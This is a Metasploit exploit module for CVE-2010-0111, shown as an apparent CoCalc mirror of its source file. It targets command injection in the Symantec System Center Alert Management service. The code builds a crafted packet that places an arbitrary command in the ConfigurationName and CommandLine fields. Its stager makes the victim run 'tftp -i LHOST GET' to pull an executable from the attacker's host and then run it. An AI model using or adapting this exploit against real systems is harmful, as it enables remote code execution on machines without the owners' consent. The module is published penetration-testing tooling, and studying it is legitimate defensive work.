Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
19593 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7


8
  Rank = ExcellentRanking

9


10
  include Msf::Exploit::Remote::Tcp

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',

18
        'Description' => %q{

19
          Symantec System Center Alert Management System is prone to a

20
          remote command-injection vulnerability because the application fails

21
          to properly sanitize user-supplied input.  This is part of Symantec

22
          AntiVirus Corporate Edition 8.0 - 10.1.7.

23
        },

24
        'Author' => [ 'MC' ],

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          ['OSVDB', '66807'],

28
          ['BID', '41959'],

29
          ['CVE', '2010-0111'],

30
          ['URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt'],

31
        ],

32
        'Targets' => [

33
          [

34
            'Windows Universal',

35
            {

36
              'Arch' => ARCH_X86,

37
              'Platform' => 'win'

38
            }

39
          ]

40
        ],

41
        'Privileged' => true,

42
        'Platform' => 'win',

43
        'DefaultTarget' => 0,

44
        'DisclosureDate' => '2010-07-26',

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options([

54
      Opt::RPORT(38292),

55
      OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),

56
      OptAddress.new('LHOST', [ false, 'The listen IP address from where the victim downloads the payload' ])

57
    ])

58
  end

59


60
  def windows_stager

61
    @pl = generate_payload_exe

62
    @tftp = Rex::Proto::TFTP::Server.new

63
    payload_name = "#{Rex::Text.rand_text_alpha_upper(11)}.exe"

64
    @tftp.register_file(payload_name, @pl, true)

65
    @tftp.start

66
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

67
    execute_command("tftp -i #{datastore['lhost']} GET #{payload_name}")

68
    print_status("Attempting to execute the payload...")

69
    execute_command(payload_name)

70
  end

71


72
  def execute_command(cmd, opts = {})

73
    connect

74
    if (cmd.length > 128)

75
      fail_with(Failure::Unknown, "Command strings greater then 128 characters will not be processed!")

76
    end

77


78
    string_uno = Rex::Text.rand_text_alpha_upper(11)

79
    string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5)

80


81
    packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"

82
    packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"

83
    packet << "\xe8\x03\x00\x00"

84
    packet << 'PRGXCNFG'

85
    packet << "\x10\x00\x00\x00"

86
    packet << "\x00\x00\x00\x00\x04"

87
    packet << 'ALHD\F'

88
    packet << "\x00\x00\x01\x00\x00"

89
    packet << "\x00\x01\x00\x0e\x00"

90
    packet << 'Risk Repaired'

91
    packet << "\x00\x25\x00"

92
    packet << 'Symantec Antivirus Corporate Edition'

93
    packet << "\x00\xf9\x1d\x13\x4a\x3f"

94
    packet << [string_uno.length + 1].pack('v') + string_uno

95
    packet << "\x00\x08\x08\x0a"

96
    packet << "\x00" + 'Risk Name'

97
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')

98
    packet << "\x00" + string_dos

99
    packet << "\x00\x08\x0a\x00"

100
    packet << 'File Path'

101
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')

102
    packet << "\x00" + string_dos

103
    packet << "\x00\x08\x11\x00"

104
    packet << 'Requested Action'

105
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')

106
    packet << "\x00" + string_dos

107
    packet << "\x00\x08\x0e\x00"

108
    packet << 'Actual Action'

109
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')

110
    packet << "\x00" + string_dos

111
    packet << "\x00\x08\x07\x00"

112
    packet << 'Logger'

113
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')

114
    packet << "\x00" + string_dos

115
    packet << "\x00\x08\x05\x00"

116
    packet << 'User'

117
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')

118
    packet << "\x00" + string_dos

119
    packet << "\x00\x08\x09\x00"

120
    packet << 'Hostname'

121
    packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno

122
    packet << "\x00\x08\x13\x00"

123
    packet << 'Corrective Actions'

124
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')

125
    packet << "\x00" + string_dos

126
    packet << "\x00\x00\x07\x08\x12\x00"

127
    packet << 'ConfigurationName'

128
    packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')

129
    packet << "\x00" + cmd

130
    packet << "\x00\x08\x0c\x00"

131
    packet << 'CommandLine'

132
    packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')

133
    packet << "\x00" + cmd

134
    packet << "\x00\x08\x08\x00"

135
    packet << 'RunArgs'

136
    packet << "\x00\x04\x00\x02\x00"

137
    packet << "\x20\x00\x03\x05\x00"

138
    packet << 'Mode'

139
    packet << "\x00\x04\x00\x02\x00\x00\x00"

140
    packet << "\x0a\x0d\x00"

141
    packet << 'FormatString'

142
    packet << "\x00\x02\x00\x00\x00\x08\x12\x00"

143
    packet << 'ConfigurationName'

144
    packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"

145
    packet << 'HandlerHost'

146
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')

147
    packet << "\x00" + string_dos

148
    packet << "\x00" * packet.length

149


150
    sock.put(packet)

151


152
    select(nil, nil, nil, 3)

153
    disconnect

154
  end

155


156
  def exploit

157
    unless datastore['CMD'].blank?

158
      print_status("Executing command '#{datastore['CMD']}'")

159
      execute_command(datastore['CMD'])

160
      return

161
    end

162


163
    case target['Platform']

164
    when 'win'

165
      if datastore['LHOST'].blank?

166
        fail_with(Failure::Unknown, 'If no custom CMD is set, LHOST is required.')

167
      end

168
      windows_stager

169
    else

170
      fail_with(Failure::Unknown, 'Target not supported.')

171
    end

172


173
    handler

174
  end

175
end

176


177